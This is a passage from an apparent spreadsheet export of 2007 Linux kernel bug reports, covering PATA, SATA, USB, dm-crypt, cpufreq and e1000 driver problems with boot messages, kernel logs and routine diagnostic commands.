    <t>Distribution: Debian Etch Hardware Environment: CPU: Intel Pentium III (Katmai) 450 Mhz 00:07.1 IDE interface [0101]: Intel Corporation 82371AB/EB/MB PIIX4 IDE [8086:7111] (rev 01) (prog-if 80 [Master]) Flags: bus master, medium devsel, latency 64 [virtual] Memory at 000001f0 (32-bit, non-prefetchable) [disabled] [size=8] [virtual] Memory at 000003f0 (type 3, non-prefetchable) [disabled] [size=1] [virtual] Memory at 00000170 (32-bit, non-prefetchable) [disabled] [size=8] [virtual] Memory at 00000370 (type 3, non-prefetchable) [disabled] [size=1] I/O ports at ffa0 [size=16] Problem Description: Hi, I want to test PATA drivers on my PC, I compiled the kernel (2.6.19 and 2.6.20) without support CONFIG_IDE and with support CONFIG_ATA, CONFIG_SATA_AHCI, CONFIG_ATA_PIIX, CONFIG_ATA_GENERIC, CONFIG_PATA_JMICRON, CONFIG_PATA_MPIIX and CONFIG_PATA_OLDPIIX. At boot, there are the error messages : atkbd.c: Spurious ACK on isa0060/serio0... atkbd.c: Spurious ACK on isa0060/serio0... atkbd.c: Spurious ACK on isa0060/serio0... atkbd.c: Spurious ACK on isa0060/serio0... The messages are fast, but according to what I could see like message, I believe that IDE controller is not recognized. I can boot with support CONFIG_IDE and without support CONFIG_ATA. Regards.</t>
  </si>
  <si>
    <t>a potential bug in "infiniband/hw/ipath/ipath_fs.c"</t>
  </si>
  <si>
    <t>2007-02-13 23:54 UTC</t>
  </si>
  <si>
    <t>Lingxiao Jiang</t>
  </si>
  <si>
    <t>2007-03-21 15:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: no Problem Description: In the function "remove_file" defined in "drivers/infiniband/hw/ipath/ipath_fs.c", "tmp" is used without any validity check. This may cause a potential runtime error because "lookup_one_len" may return errors. The problem was noticed when we found similar code in fs/configfs/inode.c (line 220-231) and fs/sysfs/inode.c (line 222-233). Suggested fix: add "if (!IS_ERR(tmp))" to enclose line 460-471 in the ipath_fs.c.</t>
  </si>
  <si>
    <t>Nvidia MCP55 sata controller using sata_nv.ko with raid5 settings is not functional</t>
  </si>
  <si>
    <t>2007-02-15 15:44 UTC</t>
  </si>
  <si>
    <t>2007-03-23 16:16 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.16 Distribution: Hardware Environment: NVIDIA MCP55 Software Environment: Linux kernel 2.6.20/2.6.19 Problem Description: When manulaly configure raid5 raid was healthy according to option ROM. I am using HP workstation 9400 with three 80 GB Westren digital sata2 in raid5 mode. Steps to reproduce: Load Linux environemnt using 2.6.19+ try to fdisk the dm-0 which is mapped to /dev/disc/discs/dics0 Observed that during the driver loading (sata_nv) reporting abnormal driver status 0x7f at port 30E7 and 30EF at sdc. The sdb aslo had similar errors. See Attached pictures. If I load linux environment using 2.6.16 the sata_nv driver works with no issues.</t>
  </si>
  <si>
    <t>Write load on DM-Crypt LUKS partition with reiserfs jams system</t>
  </si>
  <si>
    <t>2007-02-15 18:55 UTC</t>
  </si>
  <si>
    <t>Ulrich</t>
  </si>
  <si>
    <t>2009-03-19 02:29 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Ubuntu 7.04 (Feisty) Hardware Environment: i386 (AMD64 in 32-bit-mode) Software Environment: vanilla 2.6.20 kernel Description: Writing larger files onto a partition encrypted with DM-Crypt/LUKS (Filesystem: Reiserfs v. 3) freezes the system periodically every few seconds. The recently purchased computer has an AMD "Sempron 3400+" CPU (AM2-socket) installed on a mainboard with Nvidia n-force 430 chipset. The harddrive is a new 400GB SATA disk connected to the onboard SATA-terminal (kernel module: sata_nv). In addition to three smaller and unencrypted partitions (system, swap and home; still unencrypted because it's a testing setup), I created a 322-GB partition for encrypted data storage. This partition is LUKS-formatted via cryptsetup/DM-Crypt and has a Reiserfs file system. The problem is the following: Whenever I copy a slightly bigger file (e.g. 500MB) /to/ the dm-crypt- partition, the system is almost blocked for the duration of the copying process. This means that not only the system responsiveness gets rather low, but that, approx. once every two seconds, the system is completely "stalled" for a second. Even the mouse pointer and Amarok sound playback periodically stop completely. It doesn't matter if the source is one of the unencrypted partitions on the same harddisk, a CD-ROM or even an NFS-mount from a (compared to local copying) relatively slow remote server. This is particularly undesireable, e.g. if a database system for sensitive customer data is using the partition, or if the recording of video live-streams from surveillance cameras blocks the rest of the system. And especially since I thought the new standard CFQ-IO-scheduler would prevent those problems. By observing the write performance of my system, I could determine an anomaly which also seems to be connected with the above described lock-ups: Data transfer rates obtained via " time cp 'sourcelocation/ testfile' 'destination' " with a testfile of 1GByte random data. Write performance: copy: from one unencrypted filesystem to annother unencrypted filesystem on the same harddrive: 38MByte/sec from unencrypted filesystem to encrypted filesystem on the same harddrive: 16MByte/sec from 100-MBit/sec LAN NFS-mount to unencrypted filesystem on local machine: 11.2MByte/sec (maximum for 100MBit-LAN) from 100-MBit/sec LAN NFS-mount to encrypted filesystem on local machine: 6.5MByte/sec (even though 16MB/sec were possible from the local source before, and the LAN is also capable of 11.2MB/sec [!] This is the anomaly I meant before.) Read performance from encrypted partition (" time cp 1-GB-testfile.dat /dev/ null " or even " time cp 1-GB-testfile.dat /tmp " (no RAM tmpfs)) is perfect with 28 respectively 26 MByte/sec; no system lock-ups. To reproduce this problem, I downloaded, configured and compiled a vanilla 2.6.20 kernel and ran the computer with this one instead of the distribution standard, (which at the time is a 2.6.20-rc snapshot). I didn't load any third-party or binary-only kernel modules (i.e. I decommissioned the nvidia-graphics-driver). Here I have uploaded some information about my computer: http://datenparkplatz.de/DiesUndDas/lspci.output.2.6.20.vanilla.txt (output of "lspci") http://datenparkplatz.de/DiesUndDas/dmesg.output.2.6.20.vanilla.txt (output of "dmesg") http://datenparkplatz.de/DiesUndDas/proc.version.2.6.20.vanilla.txt (output of "cat /proc/version") http://datenparkplatz.de/DiesUndDas/kernelconfig-2.6.20-vanilla.txt (my kernels ".config") HTH, Ulrich</t>
  </si>
  <si>
    <t>ehci_hcd driver bug</t>
  </si>
  <si>
    <t>2007-02-16 12:56 UTC</t>
  </si>
  <si>
    <t>Alexander N. Golovko</t>
  </si>
  <si>
    <t>2008-08-26 12:47 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: debian Hardware Environment: i815 motherboard, celeron coppermine. Software Environment: Problem Description: Don't work hi-speed usb storage devices with pci usb controller. With unloaded ehci_hcd module device work without problem, but it use uhci_hcd and full-speed. Steps to reproduce: plug device and try to read information from it. % modprobe ehci_hcd Feb 16 23:06:44 glaurung kernel: ACPI: PCI Interrupt 0000:02:04.2[C] -&gt; Link [LNK0] -&gt; GSI 10 (level, low) -&gt; IRQ 10 Feb 16 23:06:44 glaurung kernel: ehci_hcd 0000:02:04.2: EHCI Host Controller Feb 16 23:06:44 glaurung kernel: ehci_hcd 0000:02:04.2: new USB bus registered, assigned bus number 5 Feb 16 23:06:44 glaurung kernel: ehci_hcd 0000:02:04.2: irq 10, io mem 0xef202000 Feb 16 23:06:44 glaurung kernel: ehci_hcd 0000:02:04.2: USB 2.0 started, EHCI 1.00, driver 10 Dec 2004 Feb 16 23:06:44 glaurung kernel: usb usb5: Product: EHCI Host Controller Feb 16 23:06:44 glaurung kernel: usb usb5: Manufacturer: Linux 2.6.20-glaurung ehci_hcd Feb 16 23:06:44 glaurung kernel: usb usb5: SerialNumber: 0000:02:04.2 Feb 16 23:06:44 glaurung kernel: usb usb5: configuration #1 chosen from 1 choice Feb 16 23:06:44 glaurung kernel: hub 5-0:1.0: USB hub found Feb 16 23:06:44 glaurung kernel: hub 5-0:1.0: 4 ports detected &lt;plug device&gt; Feb 16 23:06:58 glaurung kernel: usb 5-2: new high speed USB device using ehci_hcd and address 2 Feb 16 23:06:58 glaurung kernel: usb 5-2: Product: USB to Serial-ATA bridge Feb 16 23:06:58 glaurung kernel: usb 5-2: Manufacturer: Sunplus Technology Inc. Feb 16 23:06:58 glaurung kernel: usb 5-2: SerialNumber: ST3200822A 3LJ2A8XW Feb 16 23:06:58 glaurung kernel: usb 5-2: configuration #1 chosen from 1 choice Feb 16 23:06:58 glaurung kernel: scsi12 : SCSI emulation for USB Mass Storage devices Feb 16 23:07:03 glaurung kernel: scsi 12:0:0:0: Direct-Access ST320082 2AS PQ: 0 ANSI: 2 Feb 16 23:07:03 glaurung kernel: SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) Feb 16 23:07:03 glaurung kernel: sda: Write Protect is off Feb 16 23:07:03 glaurung kernel: SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) Feb 16 23:07:03 glaurung kernel: sda: Write Protect is off Feb 16 23:07:03 glaurung kernel: sda:&lt;7&gt;usb-storage: queuecommand called Feb 16 23:07:03 glaurung kernel: sda1 &lt; sda5 &gt; Feb 16 23:07:03 glaurung kernel: sd 12:0:0:0: Attached scsi disk sda % dd if=/dev/sda of=/dev/null (exit with error) Feb 16 23:07:48 glaurung kernel: usb 5-2: reset high speed USB device using ehci_hcd and address 2 Feb 16 23:08:00 glaurung kernel: usb 5-2: USB disconnect, address 2 Feb 16 23:08:00 glaurung kernel: sd 12:0:0:0: SCSI error: return code = 0x00010000 Feb 16 23:08:00 glaurung kernel: end_request: I/O error, dev sda, sector 48240 Feb 16 23:08:00 glaurung kernel: printk: 33 messages suppressed. Feb 16 23:08:00 glaurung kernel: sd 12:0:0:0: SCSI error: return code = 0x00010000 Feb 16 23:08:00 glaurung kernel: end_request: I/O error, dev sda, sector 48480 Feb 16 23:08:00 glaurung kernel: usb 5-2: new high speed USB device using ehci_hcd and address 3 Feb 16 23:08:00 glaurung kernel: usb 5-2: Product: USB to Serial-ATA bridge Feb 16 23:08:00 glaurung kernel: usb 5-2: Manufacturer: Sunplus Technology Inc. Feb 16 23:08:00 glaurung kernel: usb 5-2: SerialNumber: ST3200822A 3LJ2A8XW Feb 16 23:08:00 glaurung kernel: usb 5-2: configuration #1 chosen from 1 choice Feb 16 23:08:00 glaurung kernel: scsi13 : SCSI emulation for USB Mass Storage devices Feb 16 23:08:05 glaurung kernel: scsi 13:0:0:0: Direct-Access ST320082 2AS PQ: 0 ANSI: 2 Feb 16 23:08:05 glaurung kernel: SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) Feb 16 23:08:05 glaurung kernel: sda: Write Protect is off Feb 16 23:08:05 glaurung kernel: SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) Feb 16 23:08:06 glaurung kernel: sda: Write Protect is off Feb 16 23:08:06 glaurung kernel: sda:&lt;7&gt;usb-storage: queuecommand called Feb 16 23:08:06 glaurung kernel: sda1 &lt; sda5 &gt; Feb 16 23:08:06 glaurung kernel: sd 13:0:0:0: Attached scsi disk sda % dd if=/dev/sda of=/dev/null (exit with error) Feb 16 23:08:33 glaurung kernel: sd 13:0:0:0: SCSI error: return code = 0x00070000 Feb 16 23:08:33 glaurung kernel: end_request: I/O error, dev sda, sector 17408 Feb 16 23:08:33 glaurung kernel: printk: 49 messages suppressed. Feb 16 23:08:33 glaurung kernel: sd 13:0:0:0: SCSI error: return code = 0x00070000 Feb 16 23:08:33 glaurung kernel: end_request: I/O error, dev sda, sector 17648 Feb 16 23:08:33 glaurung kernel: sd 13:0:0:0: SCSI error: return code = 0x00070000 Feb 16 23:08:33 glaurung kernel: end_request: I/O error, dev sda, sector 17888 Feb 16 23:08:33 glaurung kernel: sd 13:0:0:0: SCSI error: return code = 0x00070000 Feb 16 23:08:33 glaurung kernel: end_request: I/O error, dev sda, sector 17408 Feb 16 23:08:33 glaurung kernel: usb 3-2: new full speed USB device using uhci_hcd and address 14 Feb 16 23:08:33 glaurung kernel: sd 13:0:0:0: SCSI error: return code = 0x00070000 Feb 16 23:08:33 glaurung kernel: end_request: I/O error, dev sda, sector 17408 Feb 16 23:08:34 glaurung kernel: usb 3-2: new full speed USB device using uhci_hcd and address 15 Feb 16 23:08:34 glaurung kernel: usb 3-2: new full speed USB device using uhci_hcd and address 16 Feb 16 23:08:35 glaurung kernel: usb 3-2: new full speed USB device using uhci_hcd and address 17 Feb 16 23:08:35 glaurung kernel: usb 5-2: USB disconnect, address 3 Feb 16 23:08:45 glaurung kernel: usb 5-2: new high speed USB device using ehci_hcd and address 4 Feb 16 23:08:45 glaurung kernel: usb 5-2: Product: USB to Serial-ATA bridge Feb 16 23:08:45 glaurung kernel: usb 5-2: Manufacturer: Sunplus Technology Inc. Feb 16 23:08:45 glaurung kernel: usb 5-2: SerialNumber: ST3200822A 3LJ2A8XW Feb 16 23:08:45 glaurung kernel: usb 5-2: configuration #1 chosen from 1 choice Feb 16 23:08:45 glaurung kernel: scsi14 : SCSI emulation for USB Mass Storage devices Feb 16 23:08:50 glaurung kernel: scsi 14:0:0:0: Direct-Access ST320082 2AS PQ: 0 ANSI: 2 Feb 16 23:08:50 glaurung kernel: SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) Feb 16 23:08:50 glaurung kernel: sda: Write Protect is off Feb 16 23:08:50 glaurung kernel: SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) Feb 16 23:08:50 glaurung kernel: sda: Write Protect is off Feb 16 23:08:50 glaurung kernel: sda:&lt;7&gt;usb-storage: queuecommand called Feb 16 23:08:50 glaurung kernel: sda1 &lt; sda5 &gt; Feb 16 23:08:50 glaurung kernel: sd 14:0:0:0: Attached scsi disk sda Feb 16 23:08:51 glaurung kernel: usb 5-2: reset high speed USB device using ehci_hcd and address 4 Feb 16 23:09:02 glaurung kernel: usb 5-2: USB disconnect, address 4 Feb 16 23:09:02 glaurung kernel: sd 14:0:0:0: SCSI error: return code = 0x00010000 Feb 16 23:09:02 glaurung kernel: end_request: I/O error, dev sda, sector 47730 Feb 16 23:09:02 glaurung kernel: printk: 60 messages suppressed. Feb 16 23:09:02 glaurung kernel: usb 5-2: new high speed USB device using ehci_hcd and address 5 Feb 16 23:09:03 glaurung kernel: usb 5-2: Product: USB to Serial-ATA bridge Feb 16 23:09:03 glaurung kernel: usb 5-2: Manufacturer: Sunplus Technology Inc. Feb 16 23:09:03 glaurung kernel: usb 5-2: SerialNumber: ST3200822A 3LJ2A8XW Feb 16 23:09:03 glaurung kernel: usb 5-2: configuration #1 chosen from 1 choice Feb 16 23:09:03 glaurung kernel: scsi15 : SCSI emulation for USB Mass Storage devices Feb 16 23:09:08 glaurung kernel: scsi 15:0:0:0: Direct-Access ST320082 2AS PQ: 0 ANSI: 2 Feb 16 23:09:08 glaurung kernel: SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) Feb 16 23:09:08 glaurung kernel: sda: Write Protect is off Feb 16 23:09:08 glaurung kernel: SCSI device sda: 390721968 512-byte hdwr sectors (200050 MB) Feb 16 23:09:08 glaurung kernel: sda: Write Protect is off Feb 16 23:09:08 glaurung kernel: sda:&lt;7&gt;usb-storage: queuecommand called Feb 16 23:09:08 glaurung kernel: sda1 &lt; sda5 &gt; Feb 16 23:09:08 glaurung kernel: sd 15:0:0:0: Attached scsi disk sda &lt;unplug device&gt; Feb 16 23:09:18 glaurung kernel: usb 5-2: USB disconnect, address 5 % lsmod ehci_hcd 45676 0 sd_mod 20144 0 usb_storage 47492 0 scsi_mod 142252 2 sd_mod,usb_storage ipt_MASQUERADE 3328 1 xt_state 2368 1 ipt_REJECT 4288 2 xt_tcpudp 3200 18 iptable_mangle 2720 0 iptable_nat 7492 1 nf_conntrack_ipv4 16332 2 iptable_nat iptable_filter 2880 1 ip_tables 12200 3 iptable_mangle,iptable_nat,iptable_filter x_tables 15396 6 ipt_MASQUERADE,xt_state,ipt_REJECT,xt_tcpudp,iptable_nat,ip_tables xfs 542516 1 reiserfs 236096 3 nf_nat_ftp 3488 0 nf_nat 17484 3 ipt_MASQUERADE,iptable_nat,nf_nat_ftp nf_conntrack_ftp 9440 1 nf_nat_ftp nf_conntrack 57096 7 ipt_MASQUERADE,xt_state,iptable_nat,nf_conntrack_ipv4,nf_nat_ftp,nf_nat,nf_conntrack_ftp ppp_async 11488 1 crc_ccitt 2016 1 ppp_async ppp_generic 27572 5 ppp_async slhc 6688 1 ppp_generic snd_emu10k1_synth 7072 0 snd_emux_synth 35072 1 snd_emu10k1_synth snd_seq_virmidi 6880 1 snd_emux_synth snd_seq_midi_emul 6720 1 snd_emux_synth snd_seq_dummy 3684 0 snd_seq_oss 32000 0 snd_seq_midi 8480 0 snd_seq_midi_event 7360 3 snd_seq_virmidi,snd_seq_oss,snd_seq_midi snd_seq 50256 9 snd_emux_synth,snd_seq_virmidi,snd_seq_midi_emul,snd_seq_dummy,snd_seq_oss,snd_seq_midi,snd_seq_midi_event snd_emu10k1 120544 3 snd_emu10k1_synth snd_rawmidi 24352 3 snd_seq_virmidi,snd_seq_midi,snd_emu10k1 snd_ac97_codec 94048 1 snd_emu10k1 ac97_bus 2176 1 snd_ac97_codec snd_pcm_oss 43360 0 snd_mixer_oss 16704 1 snd_pcm_oss hci_usb 16924 0 snd_pcm 78024 4 snd_emu10k1,snd_ac97_codec,snd_pcm_oss snd_seq_device 8108 8 snd_emu10k1_synth,snd_emux_synth,snd_seq_dummy,snd_seq_oss,snd_seq_midi,snd_seq,snd_emu10k1,snd_rawmidi bluetooth 53444 1 hci_usb snd_timer 22980 3 snd_seq,snd_emu10k1,snd_pcm snd_page_alloc 9896 2 snd_emu10k1,snd_pcm snd_util_mem 4704 2 snd_emux_synth,snd_emu10k1 i2c_i801 7820 0 snd_hwdep 9156 2 snd_emux_synth,snd_emu10k1 snd 51972 16 snd_emux_synth,snd_seq_virmidi,snd_seq_oss,snd_seq,snd_emu10k1,snd_rawmidi,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_seq_device,snd_timer,snd_hwdep soundcore 7968 1 snd psmouse 37736 0 intel_agp 23772 1 agpgart 32176 1 intel_agp i2c_core 22096 1 i2c_i801 evdev 10016 4 ext3 123112 1 jbd 58920 1 ext3 mbcache 8740 1 ext3 dm_mirror 20724 0 dm_snapshot 16704 0 dm_mod 56876 5 dm_mirror,dm_snapshot ide_disk 15904 8 e100 34248 0 uhci_hcd 32208 0 usbcore 146104 5 ehci_hcd,usb_storage,hci_usb,uhci_hcd piix 10020 0 [permanent] ide_core 118648 2 ide_disk,piix % cat /boot/config-2.6.20-glaurung |grep USB |grep DEBUG CONFIG_USB_DEBUG=y CONFIG_USB_STORAGE_DEBUG=y % lspci 00:00.0 Host bridge: Intel Corporation 82815 815 Chipset Host Bridge and Memory Controller Hub (rev 04) 00:01.0 PCI bridge: Intel Corporation 82815 815 Chipset AGP Bridge (rev 04) 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 05) 00:1f.0 ISA bridge: Intel Corporation 82801BA ISA Bridge (LPC) (rev 05) 00:1f.1 IDE interface: Intel Corporation 82801BA IDE U100 (rev 05) 00:1f.2 USB Controller: Intel Corporation 82801BA/BAM USB (Hub #1) (rev 05) 00:1f.3 SMBus: Intel Corporation 82801BA/BAM SMBus (rev 05) 00:1f.4 USB Controller: Intel Corporation 82801BA/BAM USB (Hub #2) (rev 05) 01:00.0 VGA compatible controller: nVidia Corporation NV34 [GeForce FX 5200] (rev a1) 02:01.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 08) 02:02.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 08) 02:03.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 07) 02:03.1 Input device controller: Creative Labs SB Live! Game Port (rev 07) 02:04.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 61) 02:04.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 61) 02:04.2 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 63) I get very similar simtoms with usb flash. Debian kernel package (linux-image- 2.6.18-2-686, package version: 2.6.18-5) have the same bug. Very similar problem described in bug 7533 Manufacturer of pci usb controler is Highpack.</t>
  </si>
  <si>
    <t>Jean-Luc Coulon</t>
  </si>
  <si>
    <t>CPU loses cpufreq link after offline/online transition (AMD, i386 specific problem)</t>
  </si>
  <si>
    <t>2007-02-18 04:18 UTC</t>
  </si>
  <si>
    <t>Bernhard Bender</t>
  </si>
  <si>
    <t>2007-05-08 01:22 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: unknown Distribution: openSuSE10.2 (probably irrelevant) A previous descussion of this problem is here: https://bugzilla.novell.com/show_bug.cgi?id=246525 Hardware Environment: hp compaq nx6325 (AMD Turion64 X2 Software Environment: Problem Description: After taking CPU1 offline and online again, the /sys/devices/system/cpu/cpu1/cpufreq link is missing. This also happens after suspend2disk and resume. While the CPU will work normally, kpowersave will report it as disabled. Steps to reproduce: as root user: # echo 0 &gt;/sys/devices/system/cpu/cpu1/online # echo 1 &gt;/sys/devices/system/cpu/cpu1/online # l /sys/devices/system/cpu/* -rw-r--r-- 1 root root 4096 2007-02-16 23:12 /sys/devices/system/cpu/sched_mc_power_savings /sys/devices/system/cpu/cpu0: total 0 drwxr-xr-x 5 root root 0 2007-02-16 23:12 ./ drwxr-xr-x 4 root root 0 2007-02-16 23:12 ../ drwxr-xr-x 5 root root 0 2007-02-17 00:08 cache/ drwxr-xr-x 3 root root 0 2007-02-16 23:12 cpufreq/ -r-------- 1 root root 4096 2007-02-16 23:12 crash_notes drwxr-xr-x 2 root root 0 2007-02-17 00:08 topology/ /sys/devices/system/cpu/cpu1: total 0 drwxr-xr-x 4 root root 0 2007-02-16 23:13 ./ drwxr-xr-x 4 root root 0 2007-02-16 23:12 ../ drwxr-xr-x 5 root root 0 2007-02-16 23:13 cache/ -r-------- 1 root root 4096 2007-02-16 23:12 crash_notes -rw------- 1 root root 0 2007-02-16 23:13 online drwxr-xr-x 2 root root 0 2007-02-16 23:13 topology/ #</t>
  </si>
  <si>
    <t>curious communication breakage with e1000 and NBT</t>
  </si>
  <si>
    <t>2.6.18.7</t>
  </si>
  <si>
    <t>2007-02-20 04:20 UTC</t>
  </si>
  <si>
    <t>Wolf Wiegand</t>
  </si>
  <si>
    <t>2008-10-30 23:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.4.32 Distribution: Univention Corporate Server Hardware Environment: i386, PCI I2O RAID controller Software Environment: Linux 2.6.18.7 Problem Description: I am installing windows clients using the unattended project. Short description of this: A PC boots a FreeDOS-Image using PXE. From within FreeDOS, all Windows installation files (about 500MB) are copied to the local disk for later installation. I have encountered a very strange problem using the e1000 network driver. At some point (the exact point differs, but this can always be reproduced), communication between the linux server and the dos client totally breaks down. I will attach a tcpdump trace. In the trace you can see that packages are being sent out to the client, but they either don't arrive at the client, or the reply packets are lost. This leads to errors on the DOS client that cannot be recovered from. This error only occurs using a 2.6-Kernel and the e1000 driver. Switching to a 2.4.32-kernel or using a different network card (we successfully tested this with a Realtek 8139) make the problem go away. This can only be reproduced with some clients, where all machines of the same class either show or don't show this behaviour. This has been reproduced at a customer site with two more linux machines on different networks. All this indicates that this problem is not caused by faulty hardware and is related to the e1000 driver. This can be reproduced with distribution kernels 2.6.18.1 and 2.6.14.7 and vanilla 2.6.18.7. I cannot test this with more recent kernels, as the hardware available for tests does not boot with 2.6.19/2.6.20 kernels (issue related to the i2o raid controller). What I've tried so far to work around this issue: - add the parameter debug=16, RxDescriptors=4096, and Flowcontrol=1 to e1000 module - ethtool -K eth0 tso off - ethtool -K eth0 sg off - echo 0 &gt; /proc/sys/net/ipv4/tcp_window_scaling Nothing of this helped. Which further information is needed to track this down? Steps to reproduce: I can describe the entire setup needed for reproduction (including unattended windows setup) if this is desired.</t>
  </si>
  <si>
    <t>SATA Problem: port is slow to respond</t>
  </si>
  <si>
    <t>2.6.19.3</t>
  </si>
  <si>
    <t>2007-02-20 10:56 UTC</t>
  </si>
  <si>
    <t>Sigmund Scheinbar</t>
  </si>
  <si>
    <t>2007-06-18 03:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.18.17 Distribution: debian [1.] One line summary of the problem: SATA Problem: port is slow to respond [2.] Full description of the problem/report: The following messages appear while booting/in dmesg [1]: [...] ata2: port is slow to respond, please be patient (Status 0x80) ata2: port failed to respond (30 secs, Status 0x80) ata2: softreset failed (device not ready) ata2: softreset failed, retrying in 5 secs ata2: port is slow to respond, please be patient (Status 0x80) ata2: port failed to respond (30 secs, Status 0x80) ata2: COMRESET failed (device not ready) ata2: hardreset failed, retrying in 5 secs ata2: port is slow to respond, please be patient (Status 0x80) ata2: port failed to respond (30 secs, Status 0x80) ata2: COMRESET failed (device not ready) ata2: reset failed, giving up scsi2 : ahci [...] This of course means extra long booting time :( [1] http://wieland.homelinux.org/hp_dc5750/dmesg_2.6.19.3.txt A further issue which - imho is coupled w/ this one - is that my cd/dvd+rw (also sata) combo drive simply does not work: firstly there is no indication in dmesg that it was found and secondly it behaves like dead: it does not open if i press the button and it does not blink; it can be opened until these message appear on the screen. I need to unplug and the replug it after shutting down/reboot so that on the next bootup the bios is able to find it (else it would still behave like dead)! The drive itself is ok i guess at least it works fine on a different OS. I found a debian bug report where the problem (but unfortunately not a solution that worked for me) is described: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=391867 [3.] Keywords (i.e., modules, networking, kernel): SATA, ATA [4.] Kernel version (from /proc/version): Linux version 2.6.19.3 (root@kvpc31) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) #2 SMP Thu Feb 15 02:59:14 CET 2007 [8.1.] Software (add the output of the ver_linux script here) http://wieland.homelinux.org/hp_dc5750/ver_linux.txt [8.2.] Processor information (from /proc/cpuinfo): http://wieland.homelinux.org/hp_dc5750/proc_cpuinfo.txt [8.3.] Module information (from /proc/modules): http://wieland.homelinux.org/hp_dc5750/proc_modules.txt [8.4.] Loaded driver and hardware information (/proc/ioports, /proc/iomem) http://wieland.homelinux.org/hp_dc5750/proc_iomem.txt http://wieland.homelinux.org/hp_dc5750/proc_ioports.txt [8.5.] PCI information ('lspci -vvv' as root) http://wieland.homelinux.org/hp_dc5750/lspci-vvv.txt [8.6.] SCSI information (from /proc/scsi/scsi) http://wieland.homelinux.org/hp_dc5750/proc_scsi_scsi.txt [X.] Other notes, patches, fixes, workarounds: Also it seems that the System is not capeable of recongnizing the HDD: hdparm -i /dev/sda HDIO_GET_IDENTITY failed: Inappropriate ioctl for device A user on an German mailinglist suggest to uses pata_atiixp instead of atiixp but yet again this does not work for me: http://lists.opensuse.org/archive/opensuse-mobile-de/ 2007-01/msg00001.html All the information i collected can be found at: http://wieland.homelinux.org/hp_dc5750/ I've tried several kernel version in the meantime, starting w/ the standard debian testing i386 kernel, then tried different vanilla versions 2.6.18.6, 2.6.19, 2.6.19.3 which are all affected in the same way. However 2.6.20 behaves differently: there is another error message which scrolls over the screen so fast that I'm not able to read it, the only thing i was able to catch that it also concerns (s)ata, looking like 'ata2.0: [...] failed [...]'</t>
  </si>
  <si>
    <t>Many stupid errors if kernel cannot mount a root fs</t>
  </si>
  <si>
    <t>2007-02-20 12:18 UTC</t>
  </si>
  <si>
    <t>2007-05-01 09:25 UTC</t>
  </si>
  <si>
    <t>If you compile your kernel the way it cannot mount a root fs (or you pass erroneous options to it like root=/dev/null) then upon boot you'll be flooded with the following message: atkbd.c: Spurious ACK on isa0060/serio Some program might be trying access hardware directly. Kernel will spit this error every 0.5 or 1 second and sometimes you cannot even understand what's wrong. The problem is discussed (and patch is provided) here http://groups.google.co.uk/group/linux.kernel/msg/197ddf90dd6e5058 ( mirror: http://lkml.org/lkml/2006/12/5/239 )</t>
  </si>
  <si>
    <t>gabriele balducci</t>
  </si>
  <si>
    <t>tifm_7xx1 broken as of 2.6.20</t>
  </si>
  <si>
    <t>2007-02-21 16:51 UTC</t>
  </si>
  <si>
    <t>2007-05-19 20:58 UTC</t>
  </si>
  <si>
    <t>As sent to lkml on 2007/02/07: Hi, I do have a problem with tifm_7xx1 and 2.6.20. First of all, the device is working with 2.6.18.2 and the out of tree tifm-0.6 release. In this case except for the first card insertion after suspend/reboot I do get the following messages: tifm_7xx1: sd card detected in socket 3 mmcblk0: mmc0:7d7f SD01G 1006080KiB mmcblk0: p1 With 2.6.20, however, I always do get only the following which is the same as for 2.6.18.2 on first card insert after reboot/suspend: tifm_7xx1: sd card detected in socket 3 Am I doing something wrong here or is there a problem? Relevant modules loaded with 2.6.20: mmc_block 7944 0 tifm_sd 10824 0 tifm_7xx1 7296 0 sdhci 17548 0 tifm_core 7960 2 tifm_sd,tifm_7xx1 mmc_core 24096 3 mmc_block,tifm_sd,sdhci Note: even though the mmc owner did direct me to the tifm maintainer, there is on the one hand no tifm maintainer either in bugzilla, nor in MAINTAINERS, nor did the tifm maintainer provide or propose any patch. Thus I stick with the mmc maintainer. If this bug is closed without resolution I'm going to reopen it as long a this issue isn't solved.</t>
  </si>
  <si>
    <t>net/ieee80211/ieee80211_crypt_tkip.c spams kernel message buffer</t>
  </si>
  <si>
    <t>2007-02-21 16:57 UTC</t>
  </si>
  <si>
    <t>2007-04-24 07:19 UTC</t>
  </si>
  <si>
